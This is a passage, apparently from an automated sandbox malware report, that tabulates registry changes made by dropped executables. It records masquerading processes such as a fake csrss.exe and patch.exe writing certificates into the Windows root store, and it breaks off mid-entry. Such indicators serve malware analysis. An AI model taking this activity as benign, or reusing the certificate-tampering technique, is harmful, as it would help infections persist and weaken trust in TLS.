| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Program Files (x86)\Gparted\Build.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a441400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b82000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Program Files (x86)\Gparted\Build.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Program Files (x86)\Gparted\Build.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b80f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010